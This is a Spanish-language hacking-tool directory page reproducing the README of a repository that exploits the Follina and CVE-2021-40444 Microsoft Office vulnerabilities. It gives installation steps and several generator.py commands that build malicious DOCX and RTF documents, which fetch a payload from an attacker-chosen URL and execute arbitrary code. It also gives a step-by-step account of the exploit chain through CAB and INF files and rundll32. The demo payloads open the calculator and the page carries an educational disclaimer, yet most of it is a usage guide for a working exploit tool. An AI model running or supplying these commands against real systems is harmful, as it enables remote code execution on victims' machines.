Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Follina-CVE-and-CVE-2021-40444 — Este repositorio contiene scripts y recursos para explotar las vulnerabilidades Follina CVE y CVE-2021-40444 en Microsoft Office. Los scripts generan archivos de documentos maliciosos que pueden ejecutar código arbitrario en el sistema de destino. | Kitploit
Herramientas/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebAnálisis de MalwarePruebas de PenetraciónAprendizaje y Educación
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

Este repositorio contiene scripts y recursos para explotar las vulnerabilidades Follina CVE y CVE-2021-40444 en Microsoft Office. Los scripts generan archivos de documentos maliciosos que pueden ejecutar código arbitrario en el sistema de destino.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 2 añosAún no revisado
Compartir

Explotando las vulnerabilidades Follina y CVE-2021-40444

Tabla de contenidos

  1. Introducción
  2. Requisitos previos
  3. Configuración e instalación
  4. Uso
  5. Explicación detallada
  6. Comandos
  7. Descargo de responsabilidad

Introducción

Este repositorio contiene scripts y recursos para explotar las vulnerabilidades Follina y CVE-2021-40444 en Microsoft Office. Los scripts generan archivos de documentos maliciosos que pueden ejecutar código arbitrario en el sistema de destino.

Requisitos previos

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • Paquetes de Python requeridos (listados en requirements.txt)

Configuración e instalación

  1. Configuración de Flare VM:

  • Asegúrate de tener Flare VM instalado. Las credenciales para la VM son:
    • Usuario: lab
    • Contraseña: password
  • Python y entorno virtual:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • Asegúrate de que Python y pip estén instalados en la máquina virtual.
    • Instala el paquete virtualenv usando el siguiente comando:
      root@kitploit:~
      pip install virtualenv
      
    • Crea un entorno virtual llamado venv:
      root@kitploit:~
      python -m virtualenv venv
      
    • Activa el entorno virtual:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • Instala los paquetes requeridos:
      root@kitploit:~
      pip install -r requirements.txt
      
  • Uso

    1. Generando el exploit:

      • Navega al directorio del proyecto y ejecuta el siguiente comando para generar el exploit:
        root@kitploit:~
        python generator.py -u http://192.168.197.132 -P test\calc.dll --host
        
        Reemplaza 192.168.197.132 con tu dirección IP.
    2. Accediendo al documento generado:

      • El archivo .docx generado estará ubicado en el directorio:
        root@kitploit:~
        C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
        

    Explicación detallada

    Explotación de la cadena

    • El documento (.docx) se abre.
    • El documento contiene una relación que apunta a HTML malicioso almacenado en document.xml.rels.
    • El enlace HTML se abre en la vista previa de IE.
    • Un objeto apunta a un archivo CAB y un iframe apunta a un archivo INF, ambos incrustados en JScript y con el prefijo de la directiva ".cpl:".
    • El archivo CAB se abre, guardando el archivo INF en el directorio %TEMP%Low.
    • El archivo INF se abre usando la directiva ".cpl:", lo que hace que rundll32 cargue lateralmente el archivo INF.

    Resumen de los scripts

    generator.py

    • Implementa un exploit para CVE-2021-40444, permitiendo la ejecución remota de código a través de Microsoft Office.
    • Contiene varias funciones auxiliares para parchear archivos CAB, crear archivos RAR, generar payloads y más.

    cab_parser.py

    • Una herramienta para ver los encabezados de archivos CAB.
    • Define clases y métodos para manejar y analizar archivos CAB.

    Sección 2.0: Configuración en Flare VM

    • Instala las herramientas y paquetes necesarios.
    • Crea y activa un entorno virtual.
    • Instala los paquetes de Python desde requirements.txt.

    Comandos

    • Genera el exploit original y pruébalo localmente:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.dll --host
      
    • Genera el exploit sin CAB aprovechando MS-MSDT (ataque Follina), en documentos DOCX y RTF:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
      
    • Genera el exploit sin CAB (solo IE) con contrabando de HTML y pruébalo localmente a través de IE:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
      
    • Genera el exploit sin CAB con RAR y pruébalo localmente a través de IE:
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
      

    Descargo de responsabilidad

    Este proyecto es solo para fines educativos. Úsalo de manera responsable y no explotes vulnerabilidades en sistemas para los que no tengas permiso para probar. El mal uso de esta información puede conllevar cargos penales.

    Descargar herramienta